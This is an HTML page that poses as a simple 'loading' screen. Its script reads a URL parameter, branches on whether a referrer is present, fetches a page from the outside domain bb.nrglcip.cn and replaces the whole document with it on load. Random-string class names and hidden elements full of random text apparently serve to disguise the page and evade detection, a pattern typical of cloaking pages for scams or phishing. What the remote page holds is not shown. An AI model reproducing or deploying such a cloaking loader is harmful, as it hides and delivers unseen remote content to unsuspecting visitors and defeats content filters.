<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lmPCug7Xuc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lmPCug7Xuc .jqGu3GZlPCX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lmPCug7Xuc .content {
            line-height: 50px;
            text-align: center
        }

        .lmPCug7Xuc .img {
            width: 100%
        }

        .lmPCug7Xuc .lCgPFeqq4fu {
            text-align: center
        }

        .lmPCug7Xuc .lCgPFeqq4fu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lmPCug7Xuc .lCgPFeqq4fu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lmPCug7Xuc .lCgPFeqq4fu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lmPCug7Xuc .lCgPFeqq4fu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lmPCug7Xuc .lCgPFeqq4fu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lmPCug7Xuc .lCgPFeqq4fu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lmPCug7Xuc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sYtAQAKMaP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rdRS6 = sYtAQAKMaP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rdRS6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rdRS6 +".html?a=share";
		}
		
        rIXjUcQhT=url+"#"+new Date().getTime();
        rIXjUcQhT && function() {
            $.get(rIXjUcQhT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>yqyouhIr4ZqTcOW2MPluxLkhLpDvg24QXChX3SrKQtinP5U</div>
<div style='display:none'>yqyouhIr4ZqTcOW2MPluxLkhLpDvg24QXChX3SrKQtinP5U</div><div class="lmPCug7Xuc">
    <div class="jqGu3GZlPCX">
        <div class="lCgPFeqq4fu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>kFfLQVQ8iUmjG3JRooNGdmkUFPMR5V6CpeRrgwpFki0wLKJUmL4uYfkpjweCXZdH</a>
<ul style='display:none' >HtrXa3uCnaElpNrgdB8L2KJEUW8xv8W3A60zj5TO3QRkl18xlwlRM4</ul>
<b style='display:none' >WtXUBq6Ft1VSW5YjZt6goi66WHYVMdZ5iLsrunmoHOlPIuuU8H688LHL6L7AOYPT0</b>
<li style='display:none' >xWQqbqQ9SoDmnbK9HIa2mPdkpxAzni04xT1MLjMrfTIM3AjRqFrqVAkeyODDq7GkEWKQG7R9vLwhCy70OkcZzwjvG</li>
<span style='display:none'>EYbCkUtes44Pu8ZUlYaqAaR0EyM7GCj57cmHBPnxa6DsnQABE2EUBZrCAAGFioUcQYTuwB33zbK2KuXz1Od</span></body>
</html>